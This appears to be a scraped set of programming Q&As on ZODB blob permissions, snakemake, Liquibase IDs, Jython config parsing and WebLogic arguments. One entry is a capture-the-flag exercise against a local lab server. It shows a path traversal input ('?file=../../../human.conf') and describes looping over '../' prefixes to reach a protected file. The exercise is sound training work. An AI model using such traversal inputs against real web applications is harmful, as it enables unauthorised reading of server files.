collective.xsendfile, ZODB blobs and UNIX file permissions - blob

I am currently trying to configure collective.xsendfile, Apache mod_xsendfile and Plone 4.
Apparently the Apache process cannot read the blobstorage files on the file system because of their permissions:
ls -lh var/blobstorage/0x00/0x00/0x00/0x00/0x00/0x18/0xd5/0x19/0x038ea09d0eddc611.blob
-r-------- 1 plone plone 1006K May 28 15:30 var/blobstorage/0x00/0x00/0x00/0x00/0x00/0x18/0xd5/0x19/0x038ea09d0eddc611.blob
How do I configure blobstorage to give additional permissions, so that Apache could access these files?

The modes with which the blobstorage writes its directories and files are hardcoded in ZODB.blob. Specifically, the standard ZODB.blob.FilesystemHelper class creates secure directories (only readable and writable for the current user) by default.
You could provide your own implementation of FilesystemHelper that either makes this configurable or simply sets the directory modes to 0750, and then patch ZODB.blob.BlobStorageMixin to use your class instead of the default:
import os
from ZODB import utils
from ZODB.blob import FilesystemHelper, BlobStorageMixin
from ZODB.blob import log, LAYOUT_MARKER


class GroupReadableFilesystemHelper(FilesystemHelper):

    def create(self):
        if not os.path.exists(self.base_dir):
            os.makedirs(self.base_dir, 0750)
            log("Blob directory '%s' does not exist. "
                "Created new directory." % self.base_dir)
        if not os.path.exists(self.temp_dir):
            os.makedirs(self.temp_dir, 0750)
            log("Blob temporary directory '%s' does not exist. "
                "Created new directory." % self.temp_dir)
        if not os.path.exists(os.path.join(self.base_dir, LAYOUT_MARKER)):
            layout_marker = open(
                os.path.join(self.base_dir, LAYOUT_MARKER), 'wb')
            layout_marker.write(self.layout_name)
        else:
            layout = open(os.path.join(self.base_dir, LAYOUT_MARKER), 'rb'
                          ).read().strip()
            if layout != self.layout_name:
                raise ValueError(
                    "Directory layout `%s` selected for blob directory %s, but "
                    "marker found for layout `%s`" %
                    (self.layout_name, self.base_dir, layout))

    def isSecure(self, path):
        """Ensure that (POSIX) path mode bits are 0750."""
        return (os.stat(path).st_mode & 027) == 0

    def getPathForOID(self, oid, create=False):
        """Given an OID, return the path on the filesystem where
        the blob data relating to that OID is stored.
        If the create flag is given, the path is also created if it didn't
        exist already.
        """
        # OIDs are numbers and sometimes passed around as integers. For our
        # computations we rely on the 64-bit packed string representation.
        if isinstance(oid, int):
            oid = utils.p64(oid)
        path = self.layout.oid_to_path(oid)
        path = os.path.join(self.base_dir, path)
        if create and not os.path.exists(path):
            try:
                os.makedirs(path, 0750)
            except OSError:
                # We might have lost a race. If so, the directory
                # must exist now
                assert os.path.exists(path)
        return path


def _blob_init_groupread(self, blob_dir, layout='automatic'):
    self.fshelper = GroupReadableFilesystemHelper(blob_dir, layout)
    self.fshelper.create()
    self.fshelper.checkSecure()
    self.dirty_oids = []


BlobStorageMixin._blob_init = _blob_init_groupread
Quite a handful; you may want to make this a feature request for ZODB3 :-)
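To make the 027 mask in the patched isSecure more concrete, here is a small standalone sketch. It uses Python 3 octal syntax (0o027) rather than the Python 2 literals above, and the function name is made up for illustration. The check passes for any mode that has no group-write bit and no bits at all for others, so 0700 and 0750 both pass while 0755 and 0770 fail:

```python
def passes_group_readable_check(mode):
    """Mirror the patched isSecure(): no group-write bit, nothing for others."""
    return (mode & 0o027) == 0


# Try the mask against a few typical directory modes.
for mode in (0o700, 0o750, 0o755, 0o770):
    print(oct(mode), passes_group_readable_check(mode))
```

In other words the docstring "mode bits are 0750" really means "at most 0750".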

While setting up a backup routine for a Zope/ZEO setup, I ran into the same problem with blob permissions.
After trying to apply the monkey patch that Mikko wrote (which is not that easy), I came up with a "real" patch to solve the problem.
The patch suggested by Martijn is not complete: it still does not set the right mode on blob files.
So here's my solution:
1.) Create a patch containing:
Index: ZODB/blob.py
===================================================================
--- ZODB/blob.py (revision 121959)
+++ ZODB/blob.py (working copy)
@@ -337,11 +337,11 @@
     def create(self):
         if not os.path.exists(self.base_dir):
-            os.makedirs(self.base_dir, 0700)
+            os.makedirs(self.base_dir, 0750)
             log("Blob directory '%s' does not exist. "
                 "Created new directory." % self.base_dir)
         if not os.path.exists(self.temp_dir):
-            os.makedirs(self.temp_dir, 0700)
+            os.makedirs(self.temp_dir, 0750)
             log("Blob temporary directory '%s' does not exist. "
                 "Created new directory." % self.temp_dir)
@@ -359,8 +359,8 @@
                     (self.layout_name, self.base_dir, layout))
     def isSecure(self, path):
-        """Ensure that (POSIX) path mode bits are 0700."""
-        return (os.stat(path).st_mode & 077) == 0
+        """Ensure that (POSIX) path mode bits are 0750."""
+        return (os.stat(path).st_mode & 027) == 0
     def checkSecure(self):
         if not self.isSecure(self.base_dir):
@@ -385,7 +385,7 @@
         if create and not os.path.exists(path):
             try:
-                os.makedirs(path, 0700)
+                os.makedirs(path, 0750)
             except OSError:
                 # We might have lost a race. If so, the directory
                 # must exist now
@@ -891,7 +891,7 @@
             file2.close()
         remove_committed(f1)
     if chmod:
-        os.chmod(f2, stat.S_IREAD)
+        os.chmod(f2, stat.S_IRUSR | stat.S_IRGRP)
 if sys.platform == 'win32':
     # On Windows, you can't remove read-only files, so make the
You can also take a look at the patch here -> http://pastebin.com/wNLYyXvw
2.) Store the patch under name 'blob.patch' in your buildout root directory
3.) Extend your buildout configuration:
parts +=
    patchblob
    postinstall

[patchblob]
recipe = collective.recipe.patch
egg = ZODB3
patches = blob.patch

[postinstall]
recipe = plone.recipe.command
command =
    chmod -R g+r ${buildout:directory}/var
    find ${buildout:directory}/var -type d | xargs chmod g+x
update-command = ${:command}
The postinstall section sets the desired group read permissions on blobs that already exist. Note that execute permission must also be given on the blob directories so that the group can enter them.
I've tested this patch with ZODB 3.10.2 and 3.10.3.
As Martijn suggested, this should be configurable and part of the ZODB directly.
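If you would rather not shell out to chmod and find, the permission fix done by the postinstall part can also be sketched in Python. This is only an illustration of the same idea (g+r on everything, g+x on directories); the function name is made up, and it assumes the calling user owns the files and that there are no dangling symlinks under the tree:

```python
import os
import stat


def add_group_access(root):
    """Add g+r to every file and g+rx to every directory at or below root."""
    for dirpath, dirnames, filenames in os.walk(root):
        # Directories need the execute bit so the group can enter them.
        dir_mode = stat.S_IMODE(os.stat(dirpath).st_mode)
        os.chmod(dirpath, dir_mode | stat.S_IRGRP | stat.S_IXGRP)
        for name in filenames:
            path = os.path.join(dirpath, name)
            file_mode = stat.S_IMODE(os.stat(path).st_mode)
            os.chmod(path, file_mode | stat.S_IRGRP)
```

Calling add_group_access("var") from the buildout directory would then correspond to the two shell commands above.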

Related

Traverse directory at URL to root in Python

How can you traverse directory to get to root in Python? I wrote some code using BeautifulSoup, but it says 'module not found'. So I have this:
#
# There is a directory traversal vulnerability in the
# following page http://127.0.0.1:8082/humantechconfig?file=human.conf
# Write a script which will attempt various levels of directory
# traversal to find the right amount that will give access
# to the root directory. Inside will be a human.conf with the flag.
#
# Note: The script can timeout if this occurs try narrowing
# down your search
import urllib.request
import os
req = urllib.request.urlopen("http://127.0.0.1:8082/humantechconfig?file=human.conf")
dirName = "/tmp"
def getListOfFiles(dirName):
    listOfFile = os.listdir(dirName)
    allFiles = list()
    for entry in listOfFile:
        # Create full path
        fullPath = os.path.join(dirName, entry)
        if os.path.isdir(fullPath):
            allFiles = allFiles + getListOfFiles(fullPath)
        else:
            allFiles.append(fullPath)
    return allFiles
listOfFiles = getListOfFiles(dirName)
print(listOfFiles)
for file in listOfFiles:
    if file.endswith(".conf"):
        f = open(file, "r")
        print(f.read())
This outputs:
/tmp/level-0/level-1/level-2/human.conf
User : Human 66
Flag: Not-Set (Must be Root Human)
However, if I change the URL to 'http://127.0.0.1:8082/humantechconfig?file=../../../human.conf', it gives me the output:
User : Human 66
Flag: Not-Set (Must be Root Human)
User : Root Human
Flag: Well done the flag is: {}
The level of directory traversal it is at fluctuates wildly, from /tmp/level-2 to /tmp/level-15; if it's at the one I wrote, then it says I'm 'Root Human'. But it won't give me the flag, despite the fact that I am suddenly 'Root Human'. Is there something wrong with the way I am traversing the directory?
It doesn't seem to matter at all if I take away the req = urllib.request.urlopen("http://127.0.0.1:8082/humantechconfig?file=human.conf") line. How can I actually send the code to that URL?
Thanks!
cyber discovery moon base challenge?
For this one, you need to keep adding '../' in front of human.conf (for example 'http://127.0.0.1:8082/humantechconfig?file=../human.conf'); the result is the URL you need to request (using urllib.request.urlopen(URL)).
The main part of the challenge is prepending ../ multiple times, which should not be hard with a simple loop. You don't need the os module.
Make sure to break out of the loop once you find the flag (or it will loop forever and give you errors).
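A minimal sketch of that loop, for the local challenge server only. The base URL and the "Well done" marker are taken from the question; the function names, the max_depth limit of 20 and the 5 second timeout are assumptions made for illustration:

```python
import urllib.request

# Base URL from the question; the file parameter is appended to it.
BASE_URL = "http://127.0.0.1:8082/humantechconfig?file="


def traversal_url(depth, filename="human.conf", base=BASE_URL):
    """Prefix the file name with `depth` copies of '../'."""
    return base + "../" * depth + filename


def fetch(url):
    """Request the URL and return the response body as text."""
    with urllib.request.urlopen(url, timeout=5) as resp:
        return resp.read().decode("utf-8", errors="replace")


def find_flag(max_depth=20, fetcher=fetch, marker="Well done"):
    """Try increasing depths and stop at the first body containing marker."""
    for depth in range(max_depth + 1):
        body = fetcher(traversal_url(depth))
        if marker in body:
            return depth, body  # stop as soon as the flag shows up
    return None  # nothing found within max_depth
```

Running print(find_flag()) against the challenge server would print the depth and the page text once the flag line appears. The fetcher parameter only exists so the loop can be tried without a network connection.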

snakemake STAR module issue and extra question

I discovered that the snakemake STAR module outputs as 'BAM Unsorted'.
Q1:Is there a way to change this to:
--outSAMtype BAM SortedByCoordinate
When I add the option in the 'extra' options I get an error message about duplicate definition:
EXITING: FATAL INPUT ERROR: duplicate parameter "outSAMtype" in input "Command-Line"
SOLUTION: keep only one definition of input parameters in each input source
Nov 15 09:46:07 ...... FATAL ERROR, exiting
logs/star/se/UY2_S7.log (END)
Should I consider adding a sorting module behind STAR instead?
Q2: How can I take a module from the wrapper repo and make it a local module, allowing me to edit it?
the code:
__author__ = "Johannes Köster"
__copyright__ = "Copyright 2016, Johannes Köster"
__email__ = "koester@jimmy.harvard.edu"
__license__ = "MIT"

import os
from snakemake.shell import shell

extra = snakemake.params.get("extra", "")
log = snakemake.log_fmt_shell(stdout=True, stderr=True)

fq1 = snakemake.input.get("fq1")
assert fq1 is not None, "input-> fq1 is a required input parameter"
fq1 = [snakemake.input.fq1] if isinstance(snakemake.input.fq1, str) else snakemake.input.fq1
fq2 = snakemake.input.get("fq2")
if fq2:
    fq2 = [snakemake.input.fq2] if isinstance(snakemake.input.fq2, str) else snakemake.input.fq2
    assert len(fq1) == len(fq2), "input-> equal number of files required for fq1 and fq2"
input_str_fq1 = ",".join(fq1)
input_str_fq2 = ",".join(fq2) if fq2 is not None else ""
input_str = " ".join([input_str_fq1, input_str_fq2])

if fq1[0].endswith(".gz"):
    readcmd = "--readFilesCommand zcat"
else:
    readcmd = ""

outprefix = os.path.dirname(snakemake.output[0]) + "/"

shell(
    "STAR "
    "{extra} "
    "--runThreadN {snakemake.threads} "
    "--genomeDir {snakemake.params.index} "
    "--readFilesIn {input_str} "
    "{readcmd} "
    "--outSAMtype BAM Unsorted "
    "--outFileNamePrefix {outprefix} "
    "--outStd Log "
    "{log}")
Q1:Is there a way to change this to:
--outSAMtype BAM SortedByCoordinate
I would add a separate sorting rule after the wrapper, as it is the most 'standardized' way of doing it. You can also use another wrapper for sorting.
There is an explanation from the author of snakemake for the reason why the default is unsorted and why there is no option for sorted output in the wrapper:
https://bitbucket.org/snakemake/snakemake/issues/440/pre-post-wrapper
Regarding the SAM/BAM issue, I would say any wrapper should always output the optimal file format. Hence, whenever I write a wrapper for a read mapper, I ensure that output is not SAM. Indexing and sorting should not be part of the same wrapper I think, because such a task has a completely different behavior regarding parallelization. Also, you would loose the mapping output if something goes wrong during the sorting or indexing.
Q2: How can I take a module from the wrapper repo and make it a local module, allowing me to edit it?
If you want to do this, one way is to download a local copy of the wrapper. In the shell portion of the downloaded wrapper, change Unsorted to {snakemake.params.outsamtype}. In your Snakefile, change wrapper to script, point it at path/to/downloaded/wrapper, and add the outsamtype parameter:
rule star_se:
    input:
        fq1 = "reads/{sample}_R1.1.fastq"
    output:
        # see STAR manual for additional output files
        "star/{sample}/Aligned.out.bam"
    log:
        "logs/star/{sample}.log"
    params:
        # path to STAR reference genome index
        index="index",
        # optional parameters
        extra="",
        outsamtype = "SortedByCoordinate"
    threads: 8
    script:
        "path/to/downloaded/wrapper"
I think a separate rule without a wrapper for sorting, or even writing your own STAR rule, is better. Modifying the wrapper defeats its whole purpose.
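If you do go the local-copy route despite that caveat, the wrapper-side change could look roughly like the sketch below. It is written as a plain function so it can be tried outside Snakemake; the function name and the list of allowed values are assumptions for illustration, and in the real wrapper the params argument would be snakemake.params:

```python
# Sort modes this sketch accepts; chosen here for illustration only.
ALLOWED_SORT_MODES = ("Unsorted", "SortedByCoordinate")


def outsamtype_option(params):
    """Build the --outSAMtype option from a params mapping.

    Falls back to the wrapper's original "Unsorted" when the rule
    does not set outsamtype.
    """
    sort_mode = params.get("outsamtype", "Unsorted")
    if sort_mode not in ALLOWED_SORT_MODES:
        raise ValueError("unsupported outsamtype: %r" % (sort_mode,))
    return "--outSAMtype BAM " + sort_mode


print(outsamtype_option({"outsamtype": "SortedByCoordinate"}))
print(outsamtype_option({}))
```

Keep in mind that STAR writes coordinate-sorted output to Aligned.sortedByCoord.out.bam rather than Aligned.out.bam, so the rule's output path would most likely need to change as well.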

Liquibase: changeset auto generate ID

How to auto generate ID of changeset with liquibase?
I don't want to set the ID of every changeset manually, is there a way to do it automatically?
I don't think that generated ids are a good idea. The reason is that Liquibase uses the changeSet id to calculate the checksum (in addition to the author and fileName). So if you ever insert a changeSet between others, the checksums of all subsequent changeSets will change and you will get tons of warnings/errors.
Anyway, I can think of these solutions if you still want to generate ids:
create your own ChangeLogParser
If you parse the ChangeLog on your own you are free to generate the ids as you want.
The downside is that you will have to provide a custom Xml Schema for the changeLog. The schema from Liquibase has a constraint on changeSet ids (required). With a new schema you'll probably have to do a significant amount of tweaking on the parser.
Alternatively you may choose another changeLog Format (YAML, JSON, Groovy). Their parsers may be easier to customize as they do not need that schema definition.
Do some preprocessing
You may write a simple xslt (Xml transformation) that generates a changeLog with changeSet ids, from a file that has none.
use timestamps as Ids
This would be my advice. It does not answer the question the way you asked it, but it is simple, consistent, provides additional information, and is good practice for other database migration tools as well: http://www.jeremyjarrell.com/using-flyway-db-with-distributed-version-control/
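As a rough illustration of the timestamp approach, an id could be produced like this when you write a new changeSet. The function name and the exact format (UTC, second resolution) are assumptions, not something Liquibase prescribes:

```python
from datetime import datetime, timezone


def timestamp_changeset_id(now=None):
    """Return a sortable id built from the given (or current UTC) time."""
    if now is None:
        now = datetime.now(timezone.utc)
    # Year first, so ids sort chronologically as plain strings.
    return now.strftime("%Y%m%d%H%M%S")


print(timestamp_changeset_id())
```

Two changeSets written within the same second would get the same id, so in a team you would probably rely on the author attribute as well to keep them apart.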
I wrote a Python script to generate unique IDs into Liquibase changelogs.
Be careful!
DO generate IDs
- when the changelog is in development or ready for release
- or when you control the checksums of the target database
DON'T generate IDs
- when the changelog(s) are deployed already
"""
###############################################################################
Purpose: Generate unique subsequent IDs into Liquibase changelogs
###############################################################################
Args:
param1: Full Windows path changelog directory (optional)
OR
--inplace: directly process changelogs (optional)
By default, XML files in the current directory are processed.
Returns:
In case of success, the output path is returned to stdout.
Otherwise, we crash and drag the system into mordor.
If you feel like wasting time you can:
a) port path handling to *nix
b) handle any obscure exceptions
c) add Unicode support (for better entertainment)
Dependencies:
Besides Python 3, in order to preserve XML comments, I had to use lxml
instead of the stock ElementTree parser.
Install lxml:
$ pip install lxml
Proxy clusterfuck? Don't panic! Simply download a .whl package from:
https://pypi.org/project/lxml/#files and install with pip.
Bugs:
Changesets having id="0" are ignored. Usually, these do not occur.
Author:
Tobias Bräutigam
Versions:
0.0.1 - re based, deprecated
0.0.2 - parse XML with lxml, CURRENT
"""
import datetime
import sys
import os
from pathlib import Path, PureWindowsPath

try:
    import lxml.etree as ET
except ImportError as error:
    print ('''
Error: module lxml is missing.
Please install it:
pip install lxml
''')
    exit()

# Process arguments
prefix = '' # hold separator, if needed
outdir = 'out'
try: sys.argv[1]
except: pass
else:
    if sys.argv[1] == '--inplace':
        outdir = ''
    else:
        prefix = outdir + '//'
        # accept Windows path syntax
        inpath = PureWindowsPath(sys.argv[1])
        # convert path format
        inpath = Path(inpath)
        os.chdir(inpath)
        try: os.mkdir(outdir)
        except: pass
        filelist = [ f for f in os.listdir(outdir) ]
        for f in filelist: os.remove(os.path.join(outdir, f))

# Parse XML, generate IDs, write file
def parseX(filename,prefix):
    cnt = 0
    print (filename)
    tree = ET.parse(filename)
    for node in tree.getiterator():
        if int(node.attrib.get('id', 0)):
            now = datetime.datetime.now()
            node.attrib['id'] = str(int(now.strftime("%H%M%S%f"))+cnt*37)
            cnt = cnt + 1
    root = tree.getroot()
    # NS URL element name is '' for Etree, lxml requires at least one character
    ET.register_namespace('x', u'http://www.liquibase.org/xml/ns/dbchangelog')
    tree = ET.ElementTree(root)
    tree.write(prefix + filename, encoding='utf-8', xml_declaration=True)
    print(str(cnt) +' ID(s) generated.')

# Process files
print('\n')
items = 0
for infile in os.listdir('.'):
    if (infile.lower().endswith('.xml')) == True:
        parseX(infile,prefix)
        items=items+1

# Message
print('\n' + str(items) + ' file(s) processed.\n\n')
if items > 0:
    print('Output was written to: \n\n')
    print(str(os.getcwd()) + '\\' + outdir + '\n')

Jython - importing a text file to assign global variables

I am using Jython and wish to import a text file that contains many configuration values such as:
QManager = MYQM
ProdDBName = MYDATABASE
etc.
.. and then I am reading the file line by line.
What I cannot figure out is this: as I read each line, I assign whatever is before the = sign to a local loop variable named MYVAR and whatever is after it to a local loop variable named MYVAL. How do I ensure that, once the loop finishes, I have a set of global variables such as QManager and ProdDBName?
I've been working on this for days - I really hope someone can help.
Many thanks,
Bret.
See other question: Properties file in python (similar to Java Properties)
Automatically setting global variables does not seem like a good idea to me. I would prefer a global ConfigParser object or a dictionary. If your config file is similar to Windows .ini files, then you can read it and set some global variables with something like:
def read_conf():
    global QManager
    import ConfigParser
    conf = ConfigParser.ConfigParser()
    conf.read('my.conf')
    QManager = conf.get('QM', 'QManager')
    print('Conf option QManager: [%s]' % (QManager))
(this assumes you have [QM] section in your my.conf config file)
If you want to parse config file without help of ConfigParser or similar module then try:
my_options = {}
f = open('my.conf')
for line in f:
    if '=' in line:
        k, v = line.split('=', 1)
        k = k.strip()
        v = v.strip()
        print('debug [%s]:[%s]' % (k, v))
        my_options[k] = v
f.close()
print('-' * 20)
# this will show just read value
print('Option QManager: [%s]' % (my_options['QManager']))
# this will fail with KeyError exception
# you must be aware of non-existing values or values
# where case differs
print('Option qmanager: [%s]' % (my_options['qmanager']))
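One way to sidestep the KeyError and the case problem mentioned in the comments above is to lower-case the keys while parsing and to look values up with a default. This is only a sketch; parse_options and get_option are made-up names, and the sample lines are the ones from the question:

```python
def parse_options(lines):
    """Parse 'key = value' lines into a dict with lower-cased keys."""
    options = {}
    for line in lines:
        if '=' in line:
            key, value = line.split('=', 1)
            options[key.strip().lower()] = value.strip()
    return options


def get_option(options, name, default=None):
    """Case-insensitive lookup that returns default instead of raising."""
    return options.get(name.lower(), default)


opts = parse_options(["QManager = MYQM", "ProdDBName = MYDATABASE"])
print(get_option(opts, "qmanager"))
print(get_option(opts, "Missing", "n/a"))
```

For a real file you would pass the open file object instead of the list, since iterating over it yields the lines.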

WebLogic - Using environment variable / double quotes in "Arguments" in "Server Start"

I have an admin server, NodeManager, and 1 managed server, all on the same machine.
I am trying to enter something similar to this to the arguments field in the Server Start tab:
-Dmy.property=%USERPROFILE%\someDir\someJar.jar
But when the managed server is started it throws this exception:
Error opening zip file or JAR manifest missing : %USERPROFILE%\someDir\someJar.jar
It appears that the environment variable is not being expanded to its value. It is just passed on to the managed server as plain text.
I tried surrounding the path with double quotes (") but the console validates the input and does not allow this: "Arguments may not contain '"'"
Even editing the config.xml file manually does not work, as the admin server then fails to start up:
<Critical> <WebLogicServer> <BEA-000362> <Server failed. Reason: [Management:141266]Parsing failure in config.xml: java.lang
.IllegalArgumentException: Arguments may not contain '"'.>
I also tried using %20 to no avail, it is just passed as %20.
I thought that perhaps this had something to do with the spaces in the value of %USERPROFILE% (which is "C:\documents and settings.."), but the same thing happens with other env. variables which point to other directories with no spaces.
My question:
Is there any supported way of:
using double quotes? What if I have to reference a folder with spaces in its name?
referencing an environment variable? What if I have to rely on its value for distributed servers where I do not know the variable's value in advance?
Edit based on comments:
Approach 1:
Open setDomainEnv.sh (Linux) or setDomainEnv.cmd (Windows) and search for export SERVER_NAME (Linux) or set SERVER_NAME (Windows). Move down two lines (i.e. skip that line and the next one).
On that line, insert:
customServerList="server1,server2" # this server list should be taken as input
isCurrServerCustom=$(echo ${customServerList} | tr ',' '\n' | grep ${SERVER_NAME} | wc -l)
if [ $isCurrServerCustom -gt 0 ]; then
    # add customJavaArg, keeping any options that are already set
    JAVA_OPTIONS="${JAVA_OPTIONS} -Dmy.property=${USERPROFILE}/someDir/someJar.jar"
fi
Save the setDomainEnv.sh file and restart the servers.
Note that I have only given logic for Linux , for Windows similar logic can be used but with batch scripting syntax.
Approach 2:
This assumes the domain is already installed and the user provides the list of servers to which the JVM argument -Dmy.property needs to be added. Jython script (use wlst.sh to execute). WLST Reference.
Usage: wlst.sh script_name props_file_location
import os
import sys
from java.io import File
from java.io import FileInputStream
from java.util import Properties

# extract properties from properties file.
print 'Loading input properties...'
propsFile = sys.argv[1]
propInputStream = FileInputStream(propsFile)
configProps = Properties()
configProps.load(propInputStream)
domainDir = configProps.get("domainDir")
# serverList in properties file should be comma separated
serverList = configProps.get("serverList")
# The current machine's logical name, as given when the domain was created, has to be supplied.
# This is the machine name on which the NodeManager for the current host is configured.
# It may not be needed as an input if the machine name equals the hostname; in that case
# the socket module can be imported and socket.gethostname() used instead.
currMachineName = configProps.get("machineName")
# os.environ is a mapping, so it is indexed rather than called
jarDir = os.environ["USERPROFILE"]
argToAdd = '-Dmy.property=' + jarDir + File.separator + 'someDir' + File.separator + 'someJar.jar'
readDomain(domainDir)
for srvr in serverList.split(","):
    cd('/Server/' + srvr)
    listenAddr = get('ListenAddress')
    if listenAddr != currMachineName:
        # Only change current host's servers
        continue
    cd('/Server/' + srvr + '/ServerStart/' + srvr)
    argsOld = get('Arguments')
    if argsOld is not None:
        set('Arguments', argsOld + ' ' + argToAdd)
    else:
        set('Arguments', argToAdd)
updateDomain()
closeDomain()
# now restart all affected servers (i.e serverList)
# one way is to connect to adminserver and shutdown them and then start again
The script has to be run on every host where the managed servers are going to be deployed, so that the JVM argument carries the host-specific value of "USERPROFILE".
BTW, to answer your question in a line: it looks like JVM arguments eventually have to be supplied as literal text, and WLS doesn't expand environment variables given as JVM arguments. It gives the impression of expanding them when this is done from startWebLogic.cmd (e.g. using %DOMAIN_HOME%), but it is the shell/cmd executor that expands them and then starts the JVM.
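To illustrate the point that expansion has to happen before the text reaches the server configuration, here is a small standalone Python sketch that expands %NAME% placeholders itself and produces the literal argument. The function name is made up, and the environment is passed in as a dictionary so the example does not depend on the machine it runs on:

```python
import os
import re

# Matches Windows-style placeholders such as %USERPROFILE%.
_PERCENT_VAR = re.compile(r"%([A-Za-z_][A-Za-z0-9_]*)%")


def expand_percent_vars(text, env=None):
    """Replace %NAME% with env[NAME]; unknown names are left untouched."""
    env = os.environ if env is None else env
    return _PERCENT_VAR.sub(lambda m: env.get(m.group(1), m.group(0)), text)


arg = expand_percent_vars(
    r"-Dmy.property=%USERPROFILE%\someDir\someJar.jar",
    {"USERPROFILE": r"C:\Users\me"},
)
print(arg)
```

The resulting string is what would be stored in the Arguments field, which is essentially what the WLST script above does with os.environ on each host.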